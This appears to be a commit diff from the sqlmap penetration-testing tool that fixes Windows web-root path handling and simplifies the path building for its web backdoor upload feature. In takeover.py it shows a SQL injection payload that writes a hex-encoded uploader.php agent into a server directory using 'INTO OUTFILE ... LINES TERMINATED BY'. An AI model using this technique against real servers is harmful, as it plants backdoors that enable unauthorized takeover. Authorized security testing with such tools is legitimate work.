Minor syntax adjustment for web backdoor functionality

2024-11-22 09:36:35 +03:00 · 2009-04-28 21:51:22 +00:00 · 2009-04-28 21:51:22 +00:00 · 57b8bb4c8e
commit 57b8bb4c8e
parent 58f3eee390
2 changed files with 4 additions and 9 deletions
--- a/lib/core/common.py
+++ b/lib/core/common.py
@ -228,7 +228,7 @@ def getDocRoot():
    pagePath = os.path.dirname(conf.path)

    if kb.os == "Windows":
-        defaultDocRoot = "C:\\Inetput\\wwwroot\\"
+        defaultDocRoot = "C:/Inetpub/wwwroot/"
    else:
        defaultDocRoot = "/var/www/"

@ -247,7 +247,7 @@ def getDocRoot():
                docRoot = absFilePath[:index]

                if absFilePathWin:
-                    docRoot = "C:\\%s" % docRoot.replace("/", "\\")
+                    docRoot = "C:/%s" % docRoot.replace("\\", "/")

                break

@ -274,7 +274,7 @@ def getDirs():
    directories = set()

    if kb.os == "Windows":
-        defaultDir = "C:\\Inetput\\wwwroot\\test\\"
+        defaultDir = "C:/Inetpub/wwwroot/test/"
    else:
        defaultDir = "/var/www/test/"

--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@ -137,14 +137,9 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
        uploaderName = "uploader.php"
        uploaderStr  = fileToStr("%s/%s" % (paths.SQLMAP_SHELL_PATH, uploaderName))

-        if kb.os == "Windows":
-            sep = "\\\\"
-        else:
-            sep = "/"
-
        for directory in directories:
            # Upload the uploader agent
-            outFile     = os.path.normpath("%s%s%s" % (directory, sep, uploaderName))
+            outFile     = os.path.normpath("%s/%s" % (directory, uploaderName))
            uplQuery    = uploaderStr.replace("WRITABLE_DIR", directory)
            query       = " LIMIT 1 INTO OUTFILE '%s' " % outFile
            query      += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)